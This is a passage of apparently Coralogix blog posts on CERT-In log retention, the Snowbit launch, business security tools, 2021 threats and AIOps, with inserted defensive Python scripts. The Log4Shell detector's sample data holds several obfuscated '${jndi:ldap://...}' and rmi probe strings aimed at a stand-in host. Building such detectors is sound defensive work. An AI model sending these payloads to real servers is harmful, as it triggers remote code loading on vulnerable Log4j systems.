New CERT-In Guidelines: What Does That Mean For You

An organization’s security protocols are vital to maintaining transparency, compliance with government regulations, and trust with customers. On April 28, 2022, the Indian Computer Emergency Response Team (CERT-In) released updated directions for compliance requirements for all India-based companies and organizations with Indian clients.

It’s critical to keep in mind that these rules are in place to keep organizations and customers safe from cybersecurity attacks and to see that the correct steps are being taken in a timely manner. 

So what does this mean for you? 

Among other requirements, you’ll have to retain your ICT system logs for a rolling period of 180 days, keep those logs within Indian jurisdiction, and report cyber incidents to CERT-In within 6 hours of noticing them.

And although this might seem overwhelming and financially burdensome, we’ve got you fully covered on all bases.

Infinite Retention with Coralogix

With growing log volumes and increasingly strict retention regulations, the cost of storing and analyzing them with traditional approaches can be a significant challenge and financial burden. Coralogix uses proprietary Streama© technology to analyze observability data in-stream without relying on indexing or a centralized data store.

This means companies can centralize their observability data and ensure they remain compliant with all local and global security requirements without breaking the bank. 

Directly Query Your Archive

As data enters Coralogix, it is parsed and enriched and then stored in an Amazon S3 archive bucket that you control. This means that, whatever level of analysis and monitoring you need, you always keep full access to your data for as long as you need it. Because the directive requires logs to be maintained within Indian jurisdiction, configure the bucket in AWS’s Mumbai region (ap-south-1) and make sure no lifecycle rule expires objects before 180 days have passed.

Query your archive directly from the Coralogix UI or via CLI with no additional compute cost or impact on your daily quota. Data can then be easily exported for an audit or reindexed to the Coralogix platform for investigation.
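As an added example (not Coralogix code or part of the original post), the following Python script checks a description of the archive bucket against the constraints above: Mumbai region, no lifecycle expiration shorter than 180 days, versioning on, and an Object Lock retention that stops anyone from purging the archive early. The bucket description dataclass, the simplified lifecycle and Object Lock shapes, and the two sample buckets are assumptions constructed for illustration.

```python
"""Added example: check an S3 archive bucket against the CERT-In retention constraints.

Shapes are simplified from the AWS S3 API responses (get-bucket-location,
get-bucket-lifecycle-configuration, get-object-lock-configuration); the
sample descriptions below are constructed, not real buckets.
"""
from dataclasses import dataclass, field
from typing import Optional

REQUIRED_REGION = "ap-south-1"  # AWS Mumbai: the directive wants logs kept within Indian jurisdiction
MIN_RETENTION_DAYS = 180        # rolling retention period required by the directive


@dataclass
class BucketDescription:
    region: str
    lifecycle_rules: list = field(default_factory=list)
    object_lock: Optional[dict] = None  # simplified: {"Mode": "COMPLIANCE"|"GOVERNANCE", "Days": n}
    versioning: str = "Suspended"       # "Enabled" or "Suspended"


def build_lifecycle_rule(expire_after_days: int, rule_id: str = "archive-retention") -> dict:
    """Rule in the shape boto3's put_bucket_lifecycle_configuration expects.

    Expiration only ever deletes, so a caller asking for a window shorter than
    the retention floor gets an error instead of a silently leaky archive.
    """
    if expire_after_days < MIN_RETENTION_DAYS:
        raise ValueError(f"expiration {expire_after_days}d is below the {MIN_RETENTION_DAYS}d floor")
    return {
        "ID": rule_id,
        "Status": "Enabled",
        "Filter": {"Prefix": ""},
        "Expiration": {"Days": expire_after_days},
    }


def shortest_expiration_days(rules: list) -> Optional[int]:
    """Smallest Expiration.Days among enabled rules, or None if nothing expires."""
    days = [
        r["Expiration"]["Days"]
        for r in rules
        if r.get("Status") == "Enabled" and "Days" in r.get("Expiration", {})
    ]
    return min(days) if days else None


def check_archive_bucket(desc: BucketDescription) -> list:
    """Return a list of findings; an empty list means the bucket passes."""
    findings = []
    if desc.region != REQUIRED_REGION:
        findings.append(f"region {desc.region} is not {REQUIRED_REGION}: logs would leave Indian jurisdiction")
    expiry = shortest_expiration_days(desc.lifecycle_rules)
    if expiry is not None and expiry < MIN_RETENTION_DAYS:
        findings.append(f"lifecycle rule expires objects after {expiry} days, below the {MIN_RETENTION_DAYS}-day floor")
    if desc.versioning != "Enabled":
        findings.append("versioning is not enabled: an overwrite or delete destroys the only copy")
    lock = desc.object_lock
    if not lock:
        findings.append("no Object Lock: a compromised credential can purge the archive before 180 days")
    elif lock.get("Mode") != "COMPLIANCE" or lock.get("Days", 0) < MIN_RETENTION_DAYS:
        findings.append(f"Object Lock should be COMPLIANCE mode for at least {MIN_RETENTION_DAYS} days, got {lock}")
    return findings


if __name__ == "__main__":
    # Constructed descriptions: one compliant bucket and one with the usual mistakes.
    compliant = BucketDescription("ap-south-1", [build_lifecycle_rule(365)],
                                  {"Mode": "COMPLIANCE", "Days": 180}, "Enabled")
    sloppy = BucketDescription("us-east-1", [{"ID": "old", "Status": "Enabled", "Expiration": {"Days": 90}}])
    for name, desc in (("compliant", compliant), ("sloppy", sloppy)):
        print(name, check_archive_bucket(desc) or "OK")
```

Lifecycle expiration is a delete timer, not a retention guarantee; the retention floor only holds if something (Object Lock in compliance mode, or at minimum versioning plus restricted delete permissions) stops an operator or an attacker with the bucket credentials from removing objects earlier.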

Extract Insights Without Indexing

Part of what sets the Coralogix platform apart is the ability to extract infinite value from your data without ever needing to index it.

Use the Logs2Metrics feature to generate metrics on the fly from your logs and send the raw log data directly to your archive. The metrics are stored for a full year for visualization and alerting at no additional cost, and the raw data can be accessed directly from your archive at any time. Advanced alerting with dynamic thresholds, log clustering, and anomaly detection can all also be leveraged without indexing.

This means that you can monitor your data with more precision, better performance, and at a much lower cost.

Optimize Your Total Cost of Ownership (TCO)

As data volumes continue to grow, costs typically increase as well. We understand different data is used for different goals. That’s why with our technology, you can designate the data to different analytics pipelines by use case, allowing you to reduce costs while maintaining system visibility.

Use our TCO Optimizer to prioritize your data to 1 of 3 data pipelines according to your analytics and monitoring needs so that you pay based on the value of your data rather than volume.  

Compliance Pipeline: Within this pipeline, you can store data that’s needed for compliance purposes. Data in this pipeline is written to your own archive bucket after passing through the parser, enrichment, and Live Tail. It can still be queried at any time, without counting against the quota, ensuring you meet all the CERT-In guidelines. 

Monitoring Pipeline: Any data that needs to be visualized, tracked, alerted, and monitored in real-time will flow in the log monitoring pipeline. Within the pipeline, you can leverage the Logs2Metrics, Alerting, and Anomaly Detection features without ever needing to index the raw log data.

With these features, you’ll be able to identify security incidents quickly, before they affect your business or customers. Remember that under the new directions, cyber incidents must be reported to CERT-In within 6 hours of noticing them.

Frequent Search Pipeline: Any data queried frequently for investigations or troubleshooting, critical or error level logs, for example, can be sent to the Frequent Search pipeline. In addition to the advanced features in the Monitoring pipeline, this data will be indexed and put in hot storage to enable lightning-fast queries.

Between all three pipelines, you have full control over where to place your data, access to all Coralogix features for all users, and have fully optimized costs with no surprises.

Regardless of which pipeline your data is sent to, all of it will be stored in your archive bucket, so you ALWAYS have full access and control in compliance with government regulations. 

Where Do Things Currently Stand

All in all, no matter which pipelines your data is in, ALL DATA is accessible from the archive regardless of indexing and retention. Rest assured, you can easily retain all your logs for 180 days (or however long you want), maintain full oversight of your system’s health, work with a cost-effective solution, and meet full compliance requirements. 

Learn more about the Coralogix platform or request a demo at any time for a personalized walkthrough! 

We’re Making Our Debut In Cybersecurity with Snowbit

2021 was a crazy year, to say the least: not only did we welcome our 2,000th customer, we announced our Series B AND Series C funding rounds, and on top of that we launched Streama©, our in-stream data analytics pipeline.

But this year, we’re going to top that!

We’re eager to share that we are venturing into cybersecurity with the launch of Snowbit! This new venture will focus on helping cloud-native companies comprehensively manage the security of their environments.

As you know, observability and security are deeply intertwined and critical to the seamless operation of cloud environments. Having become a full-stack observability player with the addition of metrics and tracing, it was natural for us to go deeper into cybersecurity.

So what are we trying to solve?

Today we are witnessing accelerating cybersecurity risks alongside the explosion of online activity since the onset of the pandemic. The acute global scarcity of cybersecurity talent aggravates the situation: most organizations are unlikely to have adequately staffed in-house security teams over the medium term, because such teams are expensive to build, hard to hire for, and hard to keep current.

As Navdeep Mantakala, Co-founder of Snowbit says, “Rapidly accelerating cyberthreats are leaving many organizations exposed and unable to effectively deal with security challenges as they arise. Snowbit aims to address fundamental security-related challenges faced today including growing cloud complexity, increasing sophistication of attacks, lack of in-house cybersecurity expertise, and the overhead of managing multiple point security solutions.”

Adding to the challenge is the increasing use of the cloud, both multi-provider infrastructure and SaaS, which dramatically broadens the attack surface and its complexity. Using multiple point solutions to address specific use cases only increases the operational overhead.

How are we solving it?

Snowbit’s Managed Extended Detection and Response (MxDR) incorporates a SaaS platform and expert services. The platform gives organizations a comprehensive view of their cloud environment’s security and compliance (CIS, NIST, SOC, PCI, ISO, HIPAA). 

The Snowbit team will work to expand on the existing capabilities of the Coralogix platform, so that all data is used to identify abnormal activity, misconfigurations, network issues, and vulnerabilities. This is rooted in the idea that every log can and should be a security log. Furthermore, it will automate threat detection and incident response via machine learning, an extensive set of pre-configured rules, alerts, dashboards, and more. 

The MxDR platform deploys a team of security analysts, researchers, and DFIR professionals stationed at Snowbit’s 24×7 Security Resource Center. There, they provide guided responses to enable organizations to more decisively respond to threats detected in their environment.

“Observability forms the bedrock of cybersecurity, and as a result, Snowbit is strategic for Coralogix as it enables us to offer a powerful integrated observability and security proposition to unlock the value of data correlation,” said Ariel Assaraf, CEO of Coralogix. “Snowbit’s platform and services enable organizations to overcome challenges of cybersecurity talent and disparate tools to more effectively secure their environments.”

With Snowbit, we have the vision to empower organizations across the globe to quickly, efficiently, and cost-effectively secure themselves against omnipresent and growing cyber risks. Snowbit is looking to offer the broadest cloud-native managed detection and response offering available to enable this. 

Make sure to sign up for updates so you can get notified once Snowbit launches. 

5 Cybersecurity Tools to Safeguard Your Business

With the exponential rise in cybercrime in the last decade, cybersecurity for businesses is no longer an option; it’s a necessity. Fuelled by the forced shift to remote working during the pandemic, US businesses saw an alarming 50% rise in reported cyber attacks per week from 2020 to 2021. Many companies still rely on outdated technologies, unclear policies, and understaffed cybersecurity teams to counter digital attacks.

So, if you’re a business looking to upgrade its cybersecurity measures, here are five powerful tools that can protect your business from breaches.

1. Access Protection

Designed to monitor outgoing and incoming network traffic, firewalls are the first layer of defense from unauthorized access in private networks. They are easy to implement, adopt, and configure based on security parameters set by the organization.

Among the different types of firewalls, one of the popular choices among businesses is a next-generation firewall. A next-generation firewall can help protect your network from threats through integrated intrusion prevention, cloud security, and application control. A proxy firewall can work well for companies looking for a budget option.

Even though firewalls block a significant portion of malicious traffic, expecting a firewall to suffice as a security solution would be a mistake. Advanced attackers build attacks that bypass even the most carefully configured firewalls, and your organization’s defenses need to keep up. So instead of relying on a single firewall, your business needs a layered defense. One of the first gaps to address is unsecured endpoints.

2. Endpoint Protection

Endpoint Protection essentially refers to securing devices that connect to a company’s private network beyond the corporate firewall. Typically, these range from laptops, mobile phones, and USB drives to printers and servers. Without a proper endpoint protection program, the organization stands to lose control over sensitive data if it’s copied to an external device from an unsecured endpoint.

Antivirus and anti-malware software are the basic elements of an endpoint protection program, but current threats demand much more. Next-generation endpoint protection with integrated AI/ML threat detection and threat hunting, together with VPNs for remote access, is essential to your business.

If your organization has shifted to being primarily remote, adopting a Zero Trust Network Access (ZTNA) model can strengthen your security. Firewalls and VPNs, though necessary, still leave an attack surface: once a user is connected, a conventional VPN grants broad access to the internal network. In contrast, ZTNA separates application access from network access, granting access to individual applications on a need-to-know basis only after the user and device have been verified. 

Combining ZTNA with a strong antivirus creates multi-layer access protection that drastically reduces your cyber risk exposure. However, as we discussed earlier, bad network actors who can bypass this security will always be present. Thus, it’s essential to have a robust monitoring system across your applications, which brings us to the next point…

3. Log Management & Observability

Log management is a fundamental security control for your applications. Information drawn from event logs is instrumental in identifying network risks early, spotting bad actors, and reconstructing what happened during a breach investigation.

However, many organizations still struggle with deriving valuable insights from log data due to complex, distributed systems, inconsistency in log data, and format differences. In such cases, a log management system like Coralogix can help. It creates a centralized, secure dashboard to make sense of raw log data, clustering millions of similar logs to help you investigate faster. Our AI-driven analysis software can help establish security baselines and alerting systems to identify critical issues and anomalies. 

A strong log monitoring and observability system also helps you detect and respond to DDoS attacks. A DDoS attack floods the bandwidth and resources of a particular server or application with traffic from many sources, typically causing a major outage. 

With observability platforms, you can get ahead of this. Coralogix’s native Cloudflare integration, combined with load balancer metrics, lets you cross-analyze attack and application metrics so your team can mitigate such attacks. In effect, you can build a DDoS early-warning system that baselines normal request rates and alerts as soon as traffic deviates from them.
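To make the early-warning idea concrete, here is an added example (not Coralogix’s alerting logic or code from the original post) that parses access-log lines, counts requests per minute, learns a baseline from the quiet minutes using a median and median absolute deviation, and flags minutes whose volume jumps far above it. The log format (combined format with the client IP as the first field), the baseline window and the multiplier are assumptions, and the log lines are constructed.

```python
"""Added example: a minimal DDoS early-warning check over access-log lines.

The log lines are constructed for this example (combined log format with a
client IP in the first field); the baseline/threshold parameters are
assumptions, not Coralogix alert settings.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from statistics import median

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Pull client IP, minute bucket and status out of one line; None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), TS_FMT)
    return {"ip": m.group("ip"), "minute": ts.replace(second=0, microsecond=0),
            "status": int(m.group("status"))}


def per_minute_stats(lines):
    """minute -> {requests, ips (set of distinct sources), errors (5xx)}, in time order."""
    stats = defaultdict(lambda: {"requests": 0, "ips": set(), "errors": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        bucket = stats[rec["minute"]]
        bucket["requests"] += 1
        bucket["ips"].add(rec["ip"])
        if rec["status"] >= 500:
            bucket["errors"] += 1
    return dict(sorted(stats.items()))


def flag_floods(stats, baseline_minutes=10, k=6.0):
    """Alert on minutes whose request count exceeds median + k*MAD of the baseline window.

    Median/MAD rather than mean/stddev so one earlier spike does not inflate the
    threshold. Distinct-IP count is reported because a volumetric DDoS shows many
    sources, while a single misbehaving client is a different problem.
    """
    minutes = list(stats)
    base = [stats[m]["requests"] for m in minutes[:baseline_minutes]]
    med = median(base)
    mad = median(abs(x - med) for x in base) or 1.0
    threshold = med + k * mad
    return [
        {"minute": m, "requests": stats[m]["requests"], "errors": stats[m]["errors"],
         "distinct_ips": len(stats[m]["ips"]), "threshold": threshold}
        for m in minutes[baseline_minutes:]
        if stats[m]["requests"] > threshold
    ]


def make_sample_lines():
    """Constructed traffic: ten quiet minutes (18-22 req/min from 20 clients), then two
    minutes of 400 req/min from 250 addresses with a third of the requests failing."""
    start = datetime(2021, 11, 3, 10, 0, tzinfo=timezone.utc)
    lines = []
    for minute in range(12):
        flood = minute >= 10
        n = 400 if flood else 18 + (minute % 5)
        for i in range(n):
            ip = f"203.0.113.{i % 250}" if flood else f"198.51.100.{i % 20}"
            ts = (start + timedelta(minutes=minute, seconds=(i * 60) // n)).strftime(TS_FMT)
            status = 503 if flood and i % 3 == 0 else 200
            lines.append(f'{ip} - - [{ts}] "GET /api/health HTTP/1.1" {status} 512')
    return lines


if __name__ == "__main__":
    for alert in flag_floods(per_minute_stats(make_sample_lines())):
        print(alert)
```

In production the baseline would be a rolling window of hours or days rather than the first ten minutes, and the alert should fire on the combination of request volume, source diversity and error rate, since a legitimate traffic spike from a marketing campaign raises volume without the 5xx surge.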

Along with logs, another source of critical business data that you should monitor regularly is email. With over 36% of data breaches in 2022 attributed to phishing, businesses cannot be too careful.

4. Email Gateway Security

As most companies share sensitive data primarily through email, email gateways are a prime target for cybercriminals. A top priority should therefore be robust filtering that identifies spam and phishing emails, malicious attachments and embedded code, and links to fraudulent websites. 

Email gateways act as a firewall for all email communications at the network level, scanning messages and quarantining malicious content. They also protect against data loss by monitoring outgoing email, and let admins manage email policies through a central dashboard. Additionally, they help businesses meet compliance requirements by securing data and archiving copies for legal purposes. 

However, the issue here is that sophisticated attacks can still bypass these security measures, especially if social engineering is involved. One wrong click by an employee can give hackers access to an otherwise robust system. That’s why the most critical security tool of them all is a strong cybersecurity training program.

5. Cybersecurity Training

Even though you might think that cybersecurity training is not a ‘tool,’ a company’s security measures are only as strong as the awareness of the employees who use them. In 2021, over 85% of data breaches involved some level of human error. IBM’s study even found that in 19 out of 20 cases analyzed, the breach would not have occurred without the human element.

Cybersecurity starts with people, not just tools. You therefore need to build a strong security culture in your organization around threats like phishing and social engineering. All cybersecurity resources should be simplified and made mandatory during onboarding, and the policies reviewed, updated, and re-taught semi-annually in line with new threats. 

Beyond training, how well these policies are executed can mean the difference between a hackable and a secure network. Regular workshops and phishing simulations should be conducted to identify employees who are likely targets. Another way to increase the effectiveness of this training is a weekly cybersecurity newsletter. 

Some companies, like Dell, have even adopted gamified cybersecurity training programs to drive employee engagement. Screen locks, multi-factor authentication, and encryption add further layers of security. 

Upgrade Your Cybersecurity Measures Today!

Implementing these five cybersecurity tools lays a critical foundation for the security of your business. The key is to understand that with cyberattacks it sometimes takes just one point of failure, so preparing for a breach is as important as preventing it. Regular, tested backups and encryption of sensitive data are crucial: they ensure your organization stays as secure as your customers need it to be, with or without a breach!

Cyber Security in 2021 – What Happened?

2021 was quite a year. Some things changed, and some things very much stayed the same. The world of cyber security was not immune to this zeitgeist, with some aspects of the threat landscape persisting and some rapidly changing and evolving. 

This piece will examine the key trends in the cybersecurity threat landscape that we saw over the last year. Covering topics from trojans to the pandemic, and everything in-between, by the end of this article, you should have a strong understanding of what happened in 2021. You might even feel better equipped to deal with 2022.

COVID-19

Unfortunately, COVID-19 is something that didn’t leave our shores for good in 2021. While the world continued to recover from the worst pandemic in a century, COVID-19 brought its own challenges for the cyber security industry and its practitioners. 

The pandemic and the shift to working from home presented challenges for organizations’ infosec teams. With phishing scams and their success rate on the rise, employers had to deliver more advanced training on social engineering. The lack of a traditional office environment compounded the problem: people who previously would have sense-checked a suspicious email with a colleague before opening it no longer could.

A further challenge that COVID-19 presented in 2021 was that many organizations, particularly small and medium-sized businesses, didn’t have the resources to kit out their employees with secure and vetted laptops for home working. Consequently, companies worldwide introduced ‘bring your own device’ policies for home working. 

This, in conjunction with the rising efficacy of phishing scams, necessitated a heightened approach to endpoint monitoring, something that many companies are still on the road to adopting. In 2021, the average cost of an endpoint security breach was close to $9.5 million, so organizations with effective observability strategies and endpoint monitoring were well positioned from a security perspective. 

Insider Threats

While a Deloitte study indicated that the working from home conditions caused by the pandemic increased the risk of malicious insider threats, risks presented by other types of insider threats were also on the rise in 2021.

Misconfigured systems are a major element of insider risk, and they are rarely put there maliciously. Human error causes far more security incidents and data breaches than external attackers do. 

In early 2021, Serasa, the Brazilian branch of Experian, experienced the leak of 220 million individuals’ personal data. While the investigation is still ongoing, early signs indicate that it resulted from an insider threat. Sadly for Experian, it isn’t the first time the company has been the victim of a significant data breach.

Even companies like Peloton, which saw massive success thanks to the pandemic, were not immune from insider threats. While it doesn’t appear to have been malicious, a misconfigured API allowed anyone to access users’ data without authenticating. While Peloton maintains that no one accessed this API maliciously, it’s another example of how an insider threat, malicious or not, can open up a raft of problems for an organization. 

Practices like GitOps and embedding observability in your development pipeline are great ways of ensuring you don’t overlook the obvious when configuring new features or setting security policies. This helps stop you from falling victim to the unintentional, or engineered, insider threat.

The Return of the Trojan

Before 2021, trojan attacks seemed somewhat passé, lost to the early-to-mid noughties and replaced by the much more fashionable ransomware. Unfortunately, the Solarwinds attack changed that, at least temporarily. 

While the Solarwinds compromise itself happened in 2020, most of the impact was felt in 2021. Essentially, attackers injected malicious code into the build of Solarwinds’ Orion product, which then shipped to customers as legitimately signed updates; customers were compromised simply by installing software they trusted. This particular attack gained a large amount of publicity because of the caliber of Solarwinds’ customers, ranging from US government agencies to Microsoft. 

Security vendors’ marketing often talks about how long an attacker resides in your systems before detection, and the Solarwinds attack was living proof of it. Investigations indicate that Solarwinds pushed updates containing the compromised code to customers as early as March 2020. The malware was sophisticated enough not only to go undetected for that long, but also to give the attackers access to victims’ systems, from which they could install further malware and exfiltrate data. 

A year on from the Solarwinds announcement, we have yet to hear the full extent of who and what was affected. It has raised the profile of “supply chain attacks,” which target a trusted vendor and use its relationship with its customers to distribute malware and exfiltrate data. It has also made organizations question their traditional vendor relationships and look in-house or to systems integrators to build out tools. 

How can you stop yourself from falling victim to another Solarwinds-type attack? One option is to build everything in-house, but if Microsoft isn’t doing that, it might be a little unrealistic. Cross-system observability can detect a supply chain compromise earlier and minimize the damage. Are you using machine learning to baseline normal network traffic across your load balancers so that anomalous behavior stands out? Maybe you should. 

Hybrid Cloud

From a technologist’s perspective, it certainly feels like 2021 was the year of the hybrid cloud. COVID-19 certainly had a role in that, but several other factors drove businesses towards a hybrid cloud in 2021. Chief among them is companies are increasingly adopting open standards to avoid vendor lock-in.

However, hybrid cloud adoption brings a new range of threats and a new attack surface for many organizations. Previously on-premises companies have to grapple with cloud security principles, which bring their own challenges and risks, and using hybrid cloud effectively usually means adopting containerization, which carries its own security considerations. 

It’s not just threats, though. Hybrid cloud presents real opportunities for innovation in cyber security. Public cloud can be used as a vault for ransomware protection (see the section below for more) or simply as a DR datacenter. These new architectures mean even smaller businesses can take advantage of the scalability and elasticity of the cloud for cyber security use cases.

Hybrid cloud security is an area where observability is vital. The ability to homogenize metrics, alerts, and triggers across your entire estate (on-prem and in the cloud) is invaluable in maintaining a healthy and protected infrastructure. 

Ransomware

It wouldn’t be a cyber security blog without talking about ransomware, would it? Cybercrime as a whole is estimated to have cost companies and individuals $6 trillion in 2021, with ransomware one of the largest contributors, which is a staggering figure. Ransomware dominated the news in 2021 because its victims were mainly government institutions or household brands.

Surprisingly, financial services businesses received fewer successful cyber attacks than any other major industry. That’s not to say that they weren’t targeted, but it likely speaks to the enhanced security procedures banks and insurance companies have in place specifically to deal with ransomware. 

As ransomware dominated the news, our inboxes, webinars, and LinkedIn targeted adverts followed suit with a range of recommendations, promises, and statistics about how to prevent it. But what do we know about preventing ransomware attacks? 

You need effective malware detection and a firewall, you need zero-trust networking, you need backups and fast recovery capabilities, and you need immutability, so that an attacker who gains administrative rights cannot encrypt or delete the backups along with everything else. Stringing these together with automation, or making the most of hybrid cloud, will undoubtedly help, but one key component will make a real difference. 

The ability to visualize and monitor all of the components above on a single pane of glass is vital. Think of it as your ransomware dashboard: an observability platform that shows you whether you’re protected, what your most recent valid backup is, and what your RPO would be if you had to restore right now.

Log4j

A pervasive known vulnerability spanning every industry and touching most companies certainly wasn’t an ideal end to 2021. 

The log4j vulnerability (CVE-2021-44228, “Log4Shell”) was made public in December 2021, and it had everyone patching, releasing urgent fixes, and questioning their use of third-party libraries in production code. We still don’t know the worldwide effect of the vulnerability, and it may take some time for that to become clear. Some early victims, such as the Belgian Defense Ministry, have already emerged, and more will undoubtedly follow.

What we do know is this: organizations’ use of libraries in production code will be reviewed, and SRE teams need to think about their ability to push fixes rapidly and roll back releases. We mentioned combining GitOps and observability above, but if there was ever a compelling reason to act, log4j was it. 
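Patching is the fix, but while the rollout is in progress you also want to know who is probing you. Here is an added example (not code from the original post) that scans web-server log lines for Log4Shell lookup strings. Attackers hid the literal `${jndi:` behind Log4j’s own `${lower:…}`, `${upper:…}` and `${…:-x}` default-value lookups and behind URL encoding, so the scanner normalizes those forms first; the sample lines are constructed and the set of obfuscations handled is an assumption, not an exhaustive list.

```python
"""Added example: flag Log4Shell (CVE-2021-44228) probe strings in log lines.

Attackers hid the literal "${jndi:" behind Log4j's own lookup syntax, so a plain
substring match misses most of the real traffic. The sample lines below are
constructed; the obfuscation forms handled are the lower/upper/default-value
lookups plus URL encoding, not an exhaustive list.
"""
import re
from urllib.parse import unquote

# ${lower:x} / ${upper:x} -> x ; ${anything:-x} (including ${::-x}) -> x
_WRAPPER_RE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*?:-([^${}]*)\}")
# What is left once the wrappers are peeled away.
_JNDI_RE = re.compile(r"\$\{\s*jndi\s*:")


def _unwrap(m):
    return m.group(1) if m.group(1) is not None else m.group(2)


def normalize(text, max_rounds=10):
    """URL-decode, lowercase, then strip lookup wrappers inside-out until stable."""
    text = unquote(text).lower()
    for _ in range(max_rounds):
        peeled = _WRAPPER_RE.sub(_unwrap, text)
        if peeled == text:
            break
        text = peeled
    return text


def is_log4shell_probe(line):
    return _JNDI_RE.search(normalize(line)) is not None


def scan(lines):
    """Return (index, line) for every line carrying a JNDI lookup after normalization."""
    return [(i, line) for i, line in enumerate(lines) if is_log4shell_probe(line)]


# Constructed web-server lines: four probe variants, then two benign requests.
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '10.0.0.5 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 612 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.9/x}"',
    '10.0.0.5 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.9/b}"',
    '10.0.0.5 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%2Fz%7D HTTP/1.1" 200 612 "-" "curl/7.79"',
    '10.0.0.6 - - [10/Dec/2021:12:00:05 +0000] "GET /docs?ref=${env:HOME} HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:12:00:06 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for idx, line in scan(SAMPLE_LINES):
        print(f"probe at line {idx}: {line}")
```

A hit in the access log tells you a probe arrived, not that it succeeded; correlate the timestamp with outbound LDAP/RMI connections from the application host, since a vulnerable Log4j instance calls back to the attacker’s server when the lookup is evaluated.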

So how do we have a better 2022?

This article may make it seem like the cyber security world was largely on fire in 2021. Not true. There were victims of all of the key trends mentioned above, and trillions of dollars will have been spent, paid, or fined as a result. But not every company fell victim to these threats, and those that didn’t were either lucky or doing things differently. It’s difficult to prescribe luck, but at Coralogix, we can offer a different approach.

By taking a holistic view of security underpinned by a leading observability platform, you can monitor and observe what’s going right and what might be going wrong at all times in your infrastructure. Sometimes you need to zoom out to deal with the problem effectively, and Coralogix gives you the ability to do just that. 

Harnessing AIOps to Improve System Security

You’ve probably seen the term AIOps appear as the subject of an article or talk recently, and there’s a reason. AIOps is merging DevOps principles with Artificial Intelligence, Big Data, and Machine Learning. It provides visibility into performance and system data on a massive scale, automating IT operations through multi-layered platforms while delivering real-time analytics.

In short, it’s a movement away from siloed operations data to a holistic approach that encompasses system-wide analysis and management from a single ML-integrated platform.

As you can imagine, AIOps has multiple benefits for system security and resilience, and one of the reasons the movement is gaining such momentum is that an AIOps-based approach has already delivered them in practice.

Why do businesses want the enhanced security of an AIOps based infrastructure?

The risk of attack from cybersecurity threats has never been higher. You’re undoubtedly aware of the many high-profile cyberattacks and data breaches that have occurred in the last few years.

There is a reason Joe Biden signed an executive order in May 2021 mandating cybersecurity best practices for US government bodies. By 2025, cybercrime is projected to cost the global economy $10.5 trillion per year. In the US, a cyberattack occurs every 39 seconds. It’s not if your systems are attacked, it’s when.

The cost of cyberattacks to your business

The costs of cyberattacks to your business are astronomical. One of the most high-profile recent cybersecurity incidents was the Colonial Pipeline ransomware attack of May 2021. The security breach by hacker group DarkSide cost the Colonial Pipeline Company an estimated minimum of $5 million.  

Small businesses aren’t immune, either. The average setback for small businesses that experience a cyberattack is $25,000. No matter the size of your systems, more and more organizations are waking up to the reality that system security cannot be low-priority.

How AIOps improves system security

To understand how AIOps can apply to system security, you’ll have to understand the basics of how AIOps works.

Enterprise systems are multi-surfaced, multi-dimensional beasts: they’re complex. Keeping them secure requires a different approach from methodologies rooted in monolithic systems, such as a traditional SIEM.

The AIOps manifesto sums up the AIOps method best with the five dimensions of AIOps:

Data set selection

To respond to security threats in real-time means acting fast. That’s why data set selection is a cornerstone of AIOps secured systems.

Modern systems generate a lot of data noise, and attackers exploit this to slip into your systems undetected, blending in with the daily traffic. Machine learning algorithms in an AIOps platform parse that noise at immense scale.

AIOps platforms create clean, curated data samples, removing the need for your ops and security teams to sift through terabytes of non-essential data to isolate threats or carry out root cause analysis. That makes it far easier to find and neutralize threats and to trace their movements back to the point of entry.

Pattern discovery

Not only does an AIOps platform remove the need to curate data manually, it also automates pattern discovery within the data sets it presents: it gives your ops and security teams only the relevant data, and explains why that data matters.

Pattern discovery uses a range of ML techniques to extract patterns from curated data. In a security context, this could mean anything from highlighting unauthorized packets during a DDoS attack to flagging which company email accounts open high volumes of virus-containing spam.
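The data set selection and pattern discovery described here, and the log clustering mentioned in the Log Management section above (collapsing millions of similar logs so you can investigate faster), rest on the same basic operation: masking the variable parts of each line so that structurally identical lines fall into one template, then looking at which templates are rare. The following is an added example of that operation (a simple masking heuristic, not Coralogix’s clustering algorithm or code from the original post); the mask rules and the sample lines are constructed assumptions.

```python
"""Added example: cluster log lines into templates and surface the rare ones.

Masking the variable parts (timestamps, IPs, IDs, counters) collapses many
near-identical lines into a handful of templates; the templates with only a
few members are where an analyst should look first. Mask rules and the sample
lines are constructed for this example, not Coralogix's clustering algorithm.
"""
import re
from collections import defaultdict

# Most specific shapes first, so an IP is not turned into four <NUM> tokens.
MASKS = [
    (re.compile(r"\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(?:\.\d+)?Z?"), "<TS>"),
    (re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b"), "<IP>"),
    (re.compile(r"\b[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\b", re.I), "<UUID>"),
    (re.compile(r"\b0x[0-9a-f]+\b|\b[0-9a-f]{16,}\b", re.I), "<HEX>"),
    (re.compile(r"\b\d+(?:\.\d+)?\b"), "<NUM>"),
]


def template_of(line):
    """Replace every variable-looking token with a placeholder."""
    for rx, token in MASKS:
        line = rx.sub(token, line)
    return line


def cluster(lines):
    """template -> list of raw lines that collapse to it."""
    groups = defaultdict(list)
    for line in lines:
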